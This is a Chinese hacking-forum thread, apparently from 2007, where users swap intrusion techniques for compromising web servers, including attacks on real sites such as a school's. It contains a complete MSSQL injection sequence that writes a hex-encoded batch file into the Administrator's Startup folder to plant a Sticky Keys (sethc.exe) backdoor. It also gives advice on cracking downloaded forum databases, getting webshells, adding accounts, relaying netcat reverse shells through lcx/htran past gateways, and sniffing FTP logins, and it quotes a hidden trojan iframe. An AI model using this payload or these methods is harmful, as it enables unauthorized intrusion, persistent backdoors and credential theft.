写了太多不必要的话.直接连结mssql差异备份就OK了

好文章 看着就热血沸腾，^_^最欣喜的还是，那天去买x档案，没带钱，那个死老板，才让我看了2分钟，现在好了xiexie !希望高手多写一点啊！
顺便问下：1，使用net命令怎么实现用户登陆时不要密码;
           2,可否介绍一点好的克隆帐号的命令，网上那些，我发现就win2000还勉强可以隐藏，2003的重启就出现用户啊

引用:

引用第4楼...于2007-10-21 07:09发表的 :
终于看到渗透过程了。。。。。。
我以为又有什么新洞呢`？~........
     小鱼以前是风云的。。。偶见过。 。

很细心。。 FlashFXP不知道为啥不行??嘿嘿。。。这种 以前偶日学校站。。利用FTP上传软件提权的很高，，
.......

呃 flashfxp 很多情况下 不行

只能是运气好时候吧
我上次就这样 只有帐号 没有密码
真闷

渗透的过程中注重每一个细节 每一个可以想到的都不防国。 运气在入侵的过程中也是最重要的。。。RP决定一切

鱼 啊
请教一个问题！
我也得到一个站点数据库连接信息(DB权限)，我也是构造一个类似你说的一个注入点，
提示可以注入，但是就是无法列出目录来，服务器应该是只是做数据存储的，打开http://ip
没有默认主页，directory list denni
有没有其他方法（还有我可以用数据库助手连接上去），可以得到一个webshell！

DB现在貌似也可以直接拿权限了
把东西备份到启动项去

但是我发现了一个动网的论坛。过程比较顺利，下载默认数据库data/dvbbs7.mdb，然后直接跑出密码直接登录了前台。兴冲冲的正准备登录后台拿Webshell呢，但是发现有点不对劲，一进入到后台页面，IE马上就卡死，开了四次都卡在那不动了。后来看了下登录页面的源文件，发现了四个如下的代码 <iframe src=http://www.xxx.mouth.cn/1.htm width=0 height=0></iframe>！不知道哪位仁兄已经挂了N个马了。只要一访问IE立刻就卡死，我冒着中马的危险又试了五六次，还是不能进入后台。郁闷死，看来只能另寻出路了……





楼主这步就开始错了 ，直接禁用ie的 iframe 或 javascript脚本就能进后台了。。。。。。。。。。。。。。。

引用:

引用第31楼qqqnnn于2007-12-31 22:04发表的 :
但是我发现了一个动网的论坛。过程比较顺利，下载默认数据库data/dvbbs7.mdb，然后直接跑出密码直接登录了前台。兴冲冲的正准备登录后台拿Webshell呢，但是发现有点不对劲，一进入到后台页面，IE马上就卡死，开了四次都卡在那不动了。后来看了下登录页面的源文件，发现了四个如下的代码 <iframe src=http://www.xxx.mouth.cn/1.htm width=0 height=0></iframe>！不知道哪位仁兄已经挂了N个马了。只要一访问IE立刻就卡死，我冒着中马的危险又试了五六次，还是不能进入后台。郁闷死，看来只能另寻出路了……




.......

高兴过头了。

但是部分功能也会不能用的`

不过就那样旁注。

这文章就没人看了。要的就是有困难一一解决

运气~`服务 设置 恰当 就算是 SA也没什么作为``

用htran做端口转发，再在本机sniffer。这样做的话正常登陆FTP的用户会受到影响吧，如果有可能的话还是反弹个shell比较不错。
鱼说的不错，RP绝定一切，呵呵。

在下觉得你那玩意不算渗透。。顶多算个WEBSHELL提权（权也没提上去对吧。其实你可以试着上传一木马然后再备份一个BAT到启动目录。）。你那个离真正的渗透远着呢。。。

nc反弹不成功   可以加上lcx    就可以连上

以前我直接反弹      结果被拦截了    "在nc上看到居然连接的是另外一个ip 打开一看."xx安全网关""

用lcx转发一下就ok

引用:

原帖由 wolfluxay 于 2007-10-21 12:32 发表

htran在guest权限下也是可以执行的，htran把21端口的数据转发到本地，然后在本地嗅探转发出来的端口，就可以嗅探到数据了。
在小d的blog上还看到有一个可以直接在guest权限下执行嗅探的c.exe
...

麻烦不...直接做vpn连上去嗅本地.....

引用:

原帖由 zczpc2000 于 2007-12-30 16:18 发表
DB现在貌似也可以直接拿权限了
把东西备份到启动项去

本菜不才。上次mickey给我一份他们小组的关于这些资料，备份进去bat文件的，里面有net user gxm /add之类的命令。但是资料上是成功的，我在本地搞了多次都不行。如果有成功的话，那么就联系我吧。

alter database [master] set RECOVERY FULL--
create table cmd (a image)--
backup log [master] to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A404563686F206F66660D0A406364202577696E646972250D0A4064656C20646972202F73202F612073657468632E6578650D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C73657468632E657865202F790D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C646C6C63616368655C73657468632E657865202F790D0A)--
backup log [master] to disk = 'C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\start.bat'--
drop table cmd--
..DB权根下..不能执行命令..
但可以浏览目录吧..
上面的..语句..把shift的后门.
备份成一个Bat.到管理员的启动项.....
我试了几个.....虽然成功备份..但不清楚是管量员太懒..几天都不用登录服务器...
还是我RP太差......那里出了问韪.........
小鱼啊..以前看你文章......自己太菜..基本上没怎么看懂......
现在..MS好了一点点..你文中提到nc上传..用htran做端口转发，再在本机sniffer。
..这个法子不是很了解..有时间..能不能...指点下......?

这个文章发到X档案了。。好象。。。

楼主写的很详细，学习了。不过对付大量挂马的页面本人有一个很实用的办法，打开IE选项里面内容审查程序，只允许当前站点永久通过，其他一律取消，这样即使挂再多的马IE也不会卡死，我用这个方法登陆很多被挂马的后台和被别人挂马的马都是屡试不爽。